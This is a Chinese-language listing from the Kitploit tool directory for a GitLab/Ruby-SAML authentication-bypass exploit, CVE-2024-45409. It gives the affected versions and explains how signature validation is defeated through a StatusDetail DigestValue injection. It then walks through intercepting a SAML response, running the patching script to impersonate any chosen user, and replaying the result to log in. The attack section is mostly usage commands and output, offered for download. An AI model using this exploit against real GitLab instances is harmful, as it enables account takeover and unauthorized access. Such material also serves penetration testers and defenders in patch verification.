Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-45409 — Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit | Kitploit
工具/GitHubGitHub/synacktiv/cve-2024-45409
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubsynacktiv/cve-2024-45409

CVE-2024-45409

Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit

查看仓库
84131年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Ruby-SAML / GitLab 认证绕过 (CVE-2024-45409) 漏洞利用

该脚本利用了 CVE-2024-45409 漏洞,允许未经身份验证的攻击者访问 IDP 签发的任何 SAML 文档,从而伪造 SAML 响应/断言,并以任意用户身份登录 GitLab。

以下 GitLab(CE/EE)版本均受影响:

  • < 16.11.10
  • 17.0.0 < 17.0.8
  • 17.0.0 < 17.1.8
  • 17.0.0 < 17.2.7
  • 17.0.0 < 17.3.3

此漏洞利用将修改后的断言的 DigestValue 注入到 StatusDetail 元素中,从而允许夹带 XPath 选择器,使其使用该值而不是 SignedInfo 块中的值。

需求

  • 一份由 IDP 签发的有效 SAML 响应

用法

root@kitploit:~
apt install python3-lxml

先拦截 URL 和 Base64 编码的 IDP SAML 响应,然后使用脚本修改 XML 内容。

root@kitploit:~
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
root@kitploit:~
$ python3 CVE-2024-45409.py -r response.url_base64 -n [email protected] -d -e -o response_patched.url_base64
[+] 解析响应
	摘要算法: sha256
	规范化方法: http://www.w3.org/2001/10/xml-exc-c14n#
[+] 从响应中移除签名
[+] 修补断言 ID
[+] 修补断言 NameID
[+] 修补断言条件
[+] 将签名移动到断言中
[+] 修补响应 ID
[+] 插入恶意引用
[+] 克隆签名引用
[+] 创建状态详情元素
[+] 修补摘要值
[+] 写入修补后的文件 response_patched.url_base64

之后,用脚本输出替换 SAMLResponse 参数的值。如果认证成功,你将被重定向到 GitLab 首页。

root@kitploit:~
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>您正在被 <a href="http://gitlab.test.local/">重定向</a>。</body></html>

参考

  • https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
  • https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
  • https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45409
  • https://www.cvedetails.com/cve/CVE-2024-45409/
下载工具